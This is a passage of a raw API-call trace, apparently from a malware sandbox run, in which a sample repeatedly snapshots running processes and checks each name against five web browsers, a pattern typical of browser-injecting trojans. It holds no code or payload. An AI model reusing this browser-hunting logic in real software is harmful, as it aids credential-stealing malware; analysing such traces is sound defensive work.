(lpString1="WmiPrvSE.exe", lpString2="opera.exe") returned 1 [0176.962] lstrcmpiA (lpString1="WmiPrvSE.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.962] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x92c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.963] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0176.963] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0176.963] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0176.963] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0176.963] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.963] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x924, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.963] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0176.963] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0176.963] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0176.963] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0176.963] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.963] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x958, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.964] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0176.964] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0176.964] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0176.964] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0176.964] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.964] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x954, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0xbdc, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0176.964] lstrcmpiA (lpString1="explorer.exe", lpString2="firefox.exe") returned -1 [0176.964] lstrcmpiA (lpString1="explorer.exe", lpString2="iexplore.exe") returned -1 [0176.964] lstrcmpiA (lpString1="explorer.exe", lpString2="chrome.exe") returned 1 [0176.964] lstrcmpiA (lpString1="explorer.exe", lpString2="opera.exe") returned -1 [0176.964] lstrcmpiA (lpString1="explorer.exe", lpString2="microsoftedgecp.exe") returned -1 [0176.964] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x968, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x790, pcPriClassBase=6, dwFlags=0x0, szExeFile="regsvr32.exe")) returned 1 [0176.965] lstrcmpiA (lpString1="regsvr32.exe", lpString2="firefox.exe") returned 1 [0176.965] lstrcmpiA (lpString1="regsvr32.exe", lpString2="iexplore.exe") returned 1 [0176.965] lstrcmpiA (lpString1="regsvr32.exe", lpString2="chrome.exe") returned 1 [0176.965] lstrcmpiA (lpString1="regsvr32.exe", lpString2="opera.exe") returned 1 [0176.965] lstrcmpiA (lpString1="regsvr32.exe", lpString2="microsoftedgecp.exe") returned 1 [0176.965] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x6ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="gtjtdfe")) returned 1 [0176.966] lstrcmpiA (lpString1="gtjtdfe", lpString2="firefox.exe") returned 1 [0176.966] lstrcmpiA (lpString1="gtjtdfe", lpString2="iexplore.exe") returned -1 [0176.966] lstrcmpiA (lpString1="gtjtdfe", lpString2="chrome.exe") returned 1 [0176.966] lstrcmpiA (lpString1="gtjtdfe", lpString2="opera.exe") returned -1 [0176.966] lstrcmpiA (lpString1="gtjtdfe", lpString2="microsoftedgecp.exe") returned -1 [0176.966] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x69006d, th32ProcessID=0x720063, th32DefaultHeapID=0x73006f, th32ModuleID=0x66006f, cntThreads=0x650074, th32ParentProcessID=0x670064, pcPriClassBase=6488165, dwFlags=0x2e0070, szExeFile="exe")) returned 0 [0176.966] CloseHandle (hObject=0xe8) returned 1 [0176.966] Sleep (dwMilliseconds=0x3e8) [0177.974] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0xe8 [0177.976] Process32First (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0177.976] lstrcmpiA (lpString1="[System Process]", lpString2="firefox.exe") returned -1 [0177.976] lstrcmpiA (lpString1="[System Process]", lpString2="iexplore.exe") returned -1 [0177.976] lstrcmpiA (lpString1="[System Process]", lpString2="chrome.exe") returned -1 [0177.976] lstrcmpiA (lpString1="[System Process]", lpString2="opera.exe") returned -1 [0177.976] lstrcmpiA (lpString1="[System Process]", lpString2="microsoftedgecp.exe") returned -1 [0177.976] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0177.977] lstrcmpiA (lpString1="System", lpString2="firefox.exe") returned 1 [0177.977] lstrcmpiA (lpString1="System", lpString2="iexplore.exe") returned 1 [0177.977] lstrcmpiA (lpString1="System", lpString2="chrome.exe") returned 1 [0177.977] lstrcmpiA (lpString1="System", lpString2="opera.exe") returned 1 [0177.977] lstrcmpiA (lpString1="System", lpString2="microsoftedgecp.exe") returned 1 [0177.977] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0177.977] lstrcmpiA (lpString1="smss.exe", lpString2="firefox.exe") returned 1 [0177.977] lstrcmpiA (lpString1="smss.exe", lpString2="iexplore.exe") returned 1 [0177.977] lstrcmpiA (lpString1="smss.exe", lpString2="chrome.exe") returned 1 [0177.977] lstrcmpiA (lpString1="smss.exe", lpString2="opera.exe") returned 1 [0177.977] lstrcmpiA (lpString1="smss.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.977] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.978] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0177.978] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0177.978] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0177.978] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0177.978] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.978] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0177.979] lstrcmpiA (lpString1="wininit.exe", lpString2="firefox.exe") returned 1 [0177.979] lstrcmpiA (lpString1="wininit.exe", lpString2="iexplore.exe") returned 1 [0177.979] lstrcmpiA (lpString1="wininit.exe", lpString2="chrome.exe") returned 1 [0177.979] lstrcmpiA (lpString1="wininit.exe", lpString2="opera.exe") returned 1 [0177.979] lstrcmpiA (lpString1="wininit.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.979] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0177.979] lstrcmpiA (lpString1="csrss.exe", lpString2="firefox.exe") returned -1 [0177.979] lstrcmpiA (lpString1="csrss.exe", lpString2="iexplore.exe") returned -1 [0177.979] lstrcmpiA (lpString1="csrss.exe", lpString2="chrome.exe") returned 1 [0177.979] lstrcmpiA (lpString1="csrss.exe", lpString2="opera.exe") returned -1 [0177.979] lstrcmpiA (lpString1="csrss.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.979] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0177.980] lstrcmpiA (lpString1="winlogon.exe", lpString2="firefox.exe") returned 1 [0177.980] lstrcmpiA (lpString1="winlogon.exe", lpString2="iexplore.exe") returned 1 [0177.980] lstrcmpiA (lpString1="winlogon.exe", lpString2="chrome.exe") returned 1 [0177.980] lstrcmpiA (lpString1="winlogon.exe", lpString2="opera.exe") returned 1 [0177.980] lstrcmpiA (lpString1="winlogon.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.980] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0177.980] lstrcmpiA (lpString1="services.exe", lpString2="firefox.exe") returned 1 [0177.980] lstrcmpiA (lpString1="services.exe", lpString2="iexplore.exe") returned 1 [0177.980] lstrcmpiA (lpString1="services.exe", lpString2="chrome.exe") returned 1 [0177.980] lstrcmpiA (lpString1="services.exe", lpString2="opera.exe") returned 1 [0177.980] lstrcmpiA (lpString1="services.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.980] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0177.981] lstrcmpiA (lpString1="lsass.exe", lpString2="firefox.exe") returned 1 [0177.981] lstrcmpiA (lpString1="lsass.exe", lpString2="iexplore.exe") returned 1 [0177.981] lstrcmpiA (lpString1="lsass.exe", lpString2="chrome.exe") returned 1 [0177.981] lstrcmpiA (lpString1="lsass.exe", lpString2="opera.exe") returned -1 [0177.981] lstrcmpiA (lpString1="lsass.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.981] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0177.982] lstrcmpiA (lpString1="lsm.exe", lpString2="firefox.exe") returned 1 [0177.982] lstrcmpiA (lpString1="lsm.exe", lpString2="iexplore.exe") returned 1 [0177.982] lstrcmpiA (lpString1="lsm.exe", lpString2="chrome.exe") returned 1 [0177.982] lstrcmpiA (lpString1="lsm.exe", lpString2="opera.exe") returned -1 [0177.982] lstrcmpiA (lpString1="lsm.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.982] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.982] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.982] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.982] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.982] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0177.982] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.982] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.983] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.983] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.983] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.983] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0177.983] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.983] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.983] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.983] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.983] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.983] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0177.983] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.983] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.984] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.984] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.984] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.984] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0177.984] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.984] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.984] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.984] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.985] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.985] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0177.985] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.985] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0177.985] lstrcmpiA (lpString1="audiodg.exe", lpString2="firefox.exe") returned -1 [0177.985] lstrcmpiA (lpString1="audiodg.exe", lpString2="iexplore.exe") returned -1 [0177.985] lstrcmpiA (lpString1="audiodg.exe", lpString2="chrome.exe") returned -1 [0177.985] lstrcmpiA (lpString1="audiodg.exe", lpString2="opera.exe") returned -1 [0177.985] lstrcmpiA (lpString1="audiodg.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.985] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.986] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.986] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.986] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.986] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0177.986] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.986] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.986] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.986] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.986] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.986] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0177.986] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.986] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0177.987] lstrcmpiA (lpString1="dwm.exe", lpString2="firefox.exe") returned -1 [0177.987] lstrcmpiA (lpString1="dwm.exe", lpString2="iexplore.exe") returned -1 [0177.987] lstrcmpiA (lpString1="dwm.exe", lpString2="chrome.exe") returned 1 [0177.987] lstrcmpiA (lpString1="dwm.exe", lpString2="opera.exe") returned -1 [0177.987] lstrcmpiA (lpString1="dwm.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.987] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0177.987] lstrcmpiA (lpString1="spoolsv.exe", lpString2="firefox.exe") returned 1 [0177.987] lstrcmpiA (lpString1="spoolsv.exe", lpString2="iexplore.exe") returned 1 [0177.987] lstrcmpiA (lpString1="spoolsv.exe", lpString2="chrome.exe") returned 1 [0177.987] lstrcmpiA (lpString1="spoolsv.exe", lpString2="opera.exe") returned 1 [0177.988] lstrcmpiA (lpString1="spoolsv.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.988] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0177.988] lstrcmpiA (lpString1="taskhost.exe", lpString2="firefox.exe") returned 1 [0177.988] lstrcmpiA (lpString1="taskhost.exe", lpString2="iexplore.exe") returned 1 [0177.988] lstrcmpiA (lpString1="taskhost.exe", lpString2="chrome.exe") returned 1 [0177.988] lstrcmpiA (lpString1="taskhost.exe", lpString2="opera.exe") returned 1 [0177.988] lstrcmpiA (lpString1="taskhost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.988] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0177.989] lstrcmpiA (lpString1="svchost.exe", lpString2="firefox.exe") returned 1 [0177.989] lstrcmpiA (lpString1="svchost.exe", lpString2="iexplore.exe") returned 1 [0177.989] lstrcmpiA (lpString1="svchost.exe", lpString2="chrome.exe") returned 1 [0177.989] lstrcmpiA (lpString1="svchost.exe", lpString2="opera.exe") returned 1 [0177.989] lstrcmpiA (lpString1="svchost.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.989] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0177.989] lstrcmpiA (lpString1="taskeng.exe", lpString2="firefox.exe") returned 1 [0177.989] lstrcmpiA (lpString1="taskeng.exe", lpString2="iexplore.exe") returned 1 [0177.989] lstrcmpiA (lpString1="taskeng.exe", lpString2="chrome.exe") returned 1 [0177.989] lstrcmpiA (lpString1="taskeng.exe", lpString2="opera.exe") returned 1 [0177.989] lstrcmpiA (lpString1="taskeng.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.989] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="abortion-serbia-effect.exe")) returned 1 [0177.990] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="firefox.exe") returned -1 [0177.990] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="iexplore.exe") returned -1 [0177.990] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="chrome.exe") returned -1 [0177.990] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="opera.exe") returned -1 [0177.990] lstrcmpiA (lpString1="abortion-serbia-effect.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.990] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beverages-tapes-dod.exe")) returned 1 [0177.990] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="firefox.exe") returned -1 [0177.990] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="iexplore.exe") returned -1 [0177.990] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="chrome.exe") returned -1 [0177.990] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="opera.exe") returned -1 [0177.991] lstrcmpiA (lpString1="beverages-tapes-dod.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.991] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="receptor paintings.exe")) returned 1 [0177.991] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="firefox.exe") returned 1 [0177.991] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="iexplore.exe") returned 1 [0177.991] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="chrome.exe") returned 1 [0177.991] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="opera.exe") returned 1 [0177.991] lstrcmpiA (lpString1="receptor paintings.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.991] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x780, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="definitely.exe")) returned 1 [0177.992] lstrcmpiA (lpString1="definitely.exe", lpString2="firefox.exe") returned -1 [0177.992] lstrcmpiA (lpString1="definitely.exe", lpString2="iexplore.exe") returned -1 [0177.992] lstrcmpiA (lpString1="definitely.exe", lpString2="chrome.exe") returned 1 [0177.992] lstrcmpiA (lpString1="definitely.exe", lpString2="opera.exe") returned -1 [0177.992] lstrcmpiA (lpString1="definitely.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.992] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x240, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="knewdifferenceskaren.exe")) returned 1 [0177.992] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="firefox.exe") returned 1 [0177.992] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="iexplore.exe") returned 1 [0177.992] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="chrome.exe") returned 1 [0177.992] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="opera.exe") returned -1 [0177.992] lstrcmpiA (lpString1="knewdifferenceskaren.exe", lpString2="microsoftedgecp.exe") returned -1 [0177.992] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="whenever.exe")) returned 1 [0177.993] lstrcmpiA (lpString1="whenever.exe", lpString2="firefox.exe") returned 1 [0177.993] lstrcmpiA (lpString1="whenever.exe", lpString2="iexplore.exe") returned 1 [0177.993] lstrcmpiA (lpString1="whenever.exe", lpString2="chrome.exe") returned 1 [0177.993] lstrcmpiA (lpString1="whenever.exe", lpString2="opera.exe") returned 1 [0177.993] lstrcmpiA (lpString1="whenever.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.993] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: lppe=0x28fad0*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x310, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="potentially.exe")) returned 1 [0177.993] lstrcmpiA (lpString1="potentially.exe", lpString2="firefox.exe") returned 1 [0177.993] lstrcmpiA (lpString1="potentially.exe", lpString2="iexplore.exe") returned 1 [0177.993] lstrcmpiA (lpString1="potentially.exe", lpString2="chrome.exe") returned 1 [0177.993] lstrcmpiA (lpString1="potentially.exe", lpString2="opera.exe") returned 1 [0177.994] lstrcmpiA (lpString1="potentially.exe", lpString2="microsoftedgecp.exe") returned 1 [0177.994] Process32Next (in: hSnapshot=0xe8, lppe=0x28fad0 | out: 